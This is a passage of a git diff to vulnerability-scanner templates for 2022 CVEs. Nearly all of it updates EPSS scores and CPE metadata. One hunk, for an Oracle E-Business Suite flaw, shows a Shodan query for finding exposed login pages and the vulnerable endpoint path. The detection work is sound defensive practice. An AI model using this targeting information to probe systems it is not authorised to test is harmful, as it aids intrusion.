cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index bb2b349f4e..c6f8ea4bf4 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0870 cwe-id: CWE-918 - epss-score: 0.00218 - epss-percentile: 0.59068 + epss-score: 0.00197 + epss-percentile: 0.5724 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 89eaa0e9f4..3f56d92601 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0885 cwe-id: CWE-862 - epss-score: 0.13941 - epss-percentile: 0.94944 + epss-score: 0.17254 + epss-percentile: 0.95486 cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index efc383351e..ae22869ebd 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0928 cwe-id: CWE-79 - epss-score: 0.00192 - epss-percentile: 0.55945 + epss-score: 0.00144 + epss-percentile: 0.49945 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 2b23308e86..f565edac34 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0948 cwe-id: CWE-89 - epss-score: 0.03849 - epss-percentile: 0.90743 + epss-score: 0.0364 + epss-percentile: 0.90598 cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 4701d4112b..ea00a8ba62 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0949 cwe-id: CWE-89 - epss-score: 0.02077 - epss-percentile: 0.87641 + epss-score: 0.02409 + epss-percentile: 0.8868 cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index c08729256e..5c25e89f05 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-0952 cwe-id: CWE-352 - epss-score: 0.03442 - epss-percentile: 0.90248 + epss-score: 0.03653 + epss-percentile: 0.90615 cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 9c924a9b54..064ee9cb6a 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0954 cwe-id: CWE-79 - epss-score: 0.00192 - epss-percentile: 0.55945 + epss-score: 0.00144 + epss-percentile: 0.49945 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 1909c76f23..37de67e48f 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0963 cwe-id: CWE-79 - epss-score: 0.00192 - epss-percentile: 0.55945 + epss-score: 0.00144 + epss-percentile: 0.49945 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index be64187d50..bf83f1d5b2 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.5 cve-id: CVE-2022-0968 cwe-id: CWE-190 - epss-score: 0.00091 - epss-percentile: 0.38112 + epss-score: 0.00076 + epss-percentile: 0.31354 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index 63fbe08423..f3995ac27e 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1007 cwe-id: CWE-79 - epss-score: 0.00112 - epss-percentile: 0.43971 + epss-score: 0.00133 + epss-percentile: 0.4806 cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 0cd5365e21..cc94c0fc57 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1013 cwe-id: CWE-89 epss-score: 0.01144 - epss-percentile: 0.82961 + epss-percentile: 0.83164 cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index dbd5af8cad..ed7c36285e 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1020 cwe-id: CWE-352 - epss-score: 0.00614 - epss-percentile: 0.76048 + epss-score: 0.0095 + epss-percentile: 0.81436 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index 21d5d1cbc3..e1c67f0d44 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1040 cwe-id: CWE-287 - epss-score: 0.97499 - epss-percentile: 0.99961 + epss-score: 0.97123 + epss-percentile: 0.99709 cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index db1727b202..aa7a31be4b 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -14,8 +14,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-1054 cwe-id: CWE-862 - epss-score: 0.0033 - epss-percentile: 0.67328 + epss-score: 0.00388 + epss-percentile: 0.70185 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 8a3f9e0e6b..c40000f4e2 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1057 cwe-id: CWE-89 - epss-score: 0.01851 - epss-percentile: 0.8685 + epss-score: 0.02077 + epss-percentile: 0.87795 cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 65268c52ea..bce1ae2df4 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1058 cwe-id: CWE-601 - epss-score: 0.00112 - epss-percentile: 0.43971 + epss-score: 0.00115 + epss-percentile: 0.44754 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 1af71e5270..11464555d4 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1119 cwe-id: CWE-22 - epss-score: 0.29102 - epss-percentile: 0.96285 + epss-score: 0.40794 + epss-percentile: 0.96853 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index 75f563dbea..5c936ff8a6 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1162 cwe-id: CWE-798 - epss-score: 0.20604 - epss-percentile: 0.95726 + epss-score: 0.17757 + epss-percentile: 0.95529 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml index 49465e3860..ed76558f6e 100644 --- a/http/cves/2022/CVE-2022-1168.yaml +++ b/http/cves/2022/CVE-2022-1168.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1168 cwe-id: CWE-79 - epss-score: 0.00112 - epss-percentile: 0.43971 + epss-score: 0.00115 + epss-percentile: 0.44754 cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 30cecbc7fc..b6bf4f8310 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1221 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45304 + epss-percentile: 0.45683 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index d6b32bb527..6187ebd85f 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-1329 cwe-id: CWE-434,CWE-862 - epss-score: 0.96419 - epss-percentile: 0.99372 + epss-score: 0.96468 + epss-percentile: 0.99425 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index a7fddb3f84..b090552374 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1386 cwe-id: CWE-918 - epss-score: 0.08014 - epss-percentile: 0.93446 + epss-score: 0.18759 + epss-percentile: 0.95637 cpe: cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index e0273b3225..8e56d9f982 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1388 cwe-id: CWE-306 - epss-score: 0.9748 - epss-percentile: 0.9995 + epss-score: 0.97139 + epss-percentile: 0.99716 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index b63c6b5bb5..614b509392 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1390 cwe-id: CWE-22 - epss-score: 0.96676 - epss-percentile: 0.99485 + epss-score: 0.96836 + epss-percentile: 0.99571 cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 551b816e81..2f49e0db9b 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1391 cwe-id: CWE-22 - epss-score: 0.02167 - epss-percentile: 0.87921 + epss-score: 0.01983 + epss-percentile: 0.87474 cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index 3e4bf5c3a2..cca478c9fb 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1392 cwe-id: CWE-22 - epss-score: 0.01182 - epss-percentile: 0.83293 + epss-score: 0.01296 + epss-percentile: 0.84327 cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index 1ab74a1b0b..c06b4bfaa8 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1398 cwe-id: CWE-918 epss-score: 0.0048 - epss-percentile: 0.72781 + epss-percentile: 0.73084 cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index bc83c444d0..d17b59eb32 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1439 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44027 + epss-score: 0.00133 + epss-percentile: 0.4806 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index 2083cd5643..26c7f8cb1e 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1442 cwe-id: CWE-862 - epss-score: 0.07166 - epss-percentile: 0.93146 + epss-score: 0.07371 + epss-percentile: 0.93317 cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index a43451a65f..11e6d90826 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1574 cwe-id: CWE-352 epss-score: 0.02682 - epss-percentile: 0.89096 + epss-percentile: 0.89251 cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 1e6b7b30f2..ff4826dbc9 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1595 cwe-id: CWE-200 epss-score: 0.0018 - epss-percentile: 0.54465 + epss-percentile: 0.54899 cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 4c36fb577a..08ce07e19b 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1597 cwe-id: CWE-79 - epss-score: 0.00252 - epss-percentile: 0.62319 + epss-score: 0.00253 + epss-percentile: 0.62798 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index 74b9c4a67b..c4c7ee4403 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-1598 cwe-id: CWE-306 - epss-score: 0.02766 - epss-percentile: 0.89258 + epss-score: 0.01976 + epss-percentile: 0.87444 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index a8e0c7fafa..9c38eaf88a 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1713 cwe-id: CWE-918 - epss-score: 0.00967 - epss-percentile: 0.81398 + epss-score: 0.01282 + epss-percentile: 0.84235 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index d3afaecb08..1f1e7259b9 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-1724 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45304 + epss-percentile: 0.45683 cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index 74faa9bf0c..909c8a9c58 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1756 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40272 + epss-percentile: 0.40575 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index 90b7b34835..c02e3f71ca 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -19,13 +19,13 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1768 cwe-id: CWE-89 - epss-score: 0.63139 - epss-percentile: 0.97399 - cpe: cpe:2.3:a:rsvpmaker_project:rsvpmaker:*:*:*:*:*:wordpress:*:* + epss-score: 0.51467 + epss-percentile: 0.97163 + cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 - vendor: rsvpmaker_project + vendor: carrcommunications product: rsvpmaker framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index a57d06af93..968f9b0000 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1815 cwe-id: CWE-918,CWE-200 - epss-score: 0.0087 - epss-percentile: 0.80286 + epss-score: 0.01154 + epss-percentile: 0.83253 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index b4d3bfca51..3ae236a2af 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1883 cwe-id: CWE-89 epss-score: 0.12349 - epss-percentile: 0.94679 + epss-percentile: 0.94776 cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index 35cedcdb7e..51d3ab9ab1 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.1 cve-id: CVE-2022-1903 cwe-id: CWE-862 - epss-score: 0.31334 - epss-percentile: 0.96409 + epss-score: 0.34643 + epss-percentile: 0.96599 cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index b687e89862..cba6a0ba47 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1904 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39802 + epss-percentile: 0.40156 cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index a4e754dfac..58da5206bc 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1906 cwe-id: CWE-79 - epss-score: 0.001 - epss-percentile: 0.40471 + epss-score: 0.00097 + epss-percentile: 0.40156 cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 672da1aead..27f2c43bbd 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1910 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45304 + epss-percentile: 0.45683 cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index d24d3ae0b7..09e03208aa 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1916 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39802 + epss-percentile: 0.40156 cpe: cpe:2.3:a:pluginus:active_products_tables_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index d8ff658180..a7b8b97f42 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1933 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39802 + epss-percentile: 0.40156 cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index 2d61c9ade9..e4fbcc5206 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1937 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39802 + epss-percentile: 0.40156 cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 175bc08c6b..f332abacf0 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1946 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39802 + epss-percentile: 0.40156 cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 38b9311924..55c025c0ad 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1952 cwe-id: CWE-434 epss-score: 0.95933 - epss-percentile: 0.99225 + epss-percentile: 0.99266 cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 6088abb6d1..c091c46d1d 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2034 cwe-id: CWE-639 - epss-score: 0.00569 - epss-percentile: 0.75021 + epss-score: 0.00576 + epss-percentile: 0.75481 cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index cf97ee1853..99925b48a9 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-21371 cwe-id: CWE-22 epss-score: 0.96287 - epss-percentile: 0.99331 + epss-percentile: 0.99362 cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 4ebf104f3c..cde2efc8ae 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -18,12 +18,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-21500 - epss-score: 0.95664 - epss-percentile: 0.99159 + epss-score: 0.29303 + epss-percentile: 0.96342 cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* metadata: verified: true - max-request: 5 + max-request: 4 vendor: oracle product: e-business_suite shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 @@ -38,6 +38,7 @@ http: - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index 1bd1455ec7..276758d1b0 100644 --- a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-21587 cwe-id: CWE-306 - epss-score: 0.97288 - epss-percentile: 0.99785 + epss-score: 0.96564 + epss-percentile: 0.99466 cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 45a84021e3..7df4c9100f 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21661 cwe-id: CWE-89 - epss-score: 0.93816 - epss-percentile: 